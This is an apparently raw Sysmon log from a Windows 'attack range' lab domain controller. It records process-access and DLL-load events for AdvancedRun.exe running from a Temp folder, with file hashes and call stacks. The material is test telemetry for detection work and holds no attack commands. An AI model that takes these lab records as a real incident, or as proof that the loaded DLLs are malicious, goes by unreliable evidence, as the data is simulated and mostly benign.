16:52:30.251{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.219{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.219{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.205{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.205{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.205{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.205{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003911147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.001{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.972{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.844{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.829{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.829{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.829{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.782{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.766{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.735{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.688{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.688{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003910783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003910782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003910781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.782{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003910762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.345{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.345{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.329{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.298{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.298{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.235{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.235{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft 